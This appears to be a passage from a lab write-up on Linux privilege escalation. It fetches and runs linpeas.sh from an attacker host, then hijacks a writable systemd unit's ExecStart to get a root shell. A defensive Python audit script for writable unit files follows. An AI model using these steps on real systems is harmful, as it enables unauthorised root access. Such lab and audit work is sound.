Privilege escalation
# Start a web server on port 80
python3 -m http.server 80 -d /usr/share/peass/linpeas/
# Download it to the victim machine
cd /tmp && wget http://192.168.45.230/linpeas.sh
# Run the file
chmod a+x linpeas.sh
./linpeas.sh
Result from Linpeas.sh

Checking pythonapp.service
Let's first read the content of this file.

Looking at the content, it is clear that this file is responsible for executing or running the service.

Luckily, I have read and write access to this file. So, I will edit the ExecStart parameter with a shell command.
I am unable to edit this file in the shell. So, I will take it to my Kali Linux machine, modify it, and then replace this file. I was unable to do that, as not all ports can connect to external networks.
I will edit the file in the terminal itself.
I have edited the file in Kali Linux and then replaced it.
We have changed the ExecStart value and also the User value.

Start the web server and send this file to the temp directory.
Send the file to the victim machine.

I tried to remove the original file, but this didn't work.

So, I will replace the file content using redirection.

This worked!!

We can see that the current user has reboot permission. So, I will restart and see if we can get the shell.
Start the listener.
Now reboot the system.

After some time you will see that you got the root shell.

Stabilize the shell.
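
The escalation above worked because a non-root user could write to the pythonapp.service unit file. The following audit script is an added example, not part of the original write-up: it lists unit files that an untrusted owner, the file's group, or any user can modify, together with the ExecStart and User values that would run. The function names and the default directory are assumptions made for illustration.

```python
import os
import stat
import sys

UNIT_SUFFIXES = (".service", ".socket", ".timer", ".path", ".mount")

def unit_settings(path, keys=("ExecStart", "User")):
    """Return the last value of each requested key in a unit file."""
    found = {}
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            key, sep, value = line.strip().partition("=")
            if sep and key.strip() in keys:
                found[key.strip()] = value.strip()
    return found

def audit_unit_dir(directory, trusted_uids=(0,)):
    """Return (path, reasons, settings) for each unit file that an
    untrusted owner, its group, or any user could modify."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in sorted(files):
            if not name.endswith(UNIT_SUFFIXES):
                continue
            path = os.path.join(root, name)
            try:
                st = os.stat(path)  # follow symlinks: the target is what gets loaded
            except OSError:
                continue  # dangling symlink
            if not stat.S_ISREG(st.st_mode):
                continue  # e.g. masked units linked to /dev/null
            reasons = []
            if st.st_uid not in trusted_uids:
                reasons.append(f"owner uid {st.st_uid} is not trusted")
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if reasons:
                findings.append((path, reasons, unit_settings(path)))
    return findings

if __name__ == "__main__":
    # Assumed default: the usual directory for locally installed units.
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/systemd/system"
    for path, reasons, settings in audit_unit_dir(target):
        print(f"{path}: {', '.join(reasons)}")
        print(f"  ExecStart={settings.get('ExecStart')}  User={settings.get('User', 'root (default)')}")
```

A writable parent directory is an equivalent risk, since it allows the unit file to be replaced, and is not checked here.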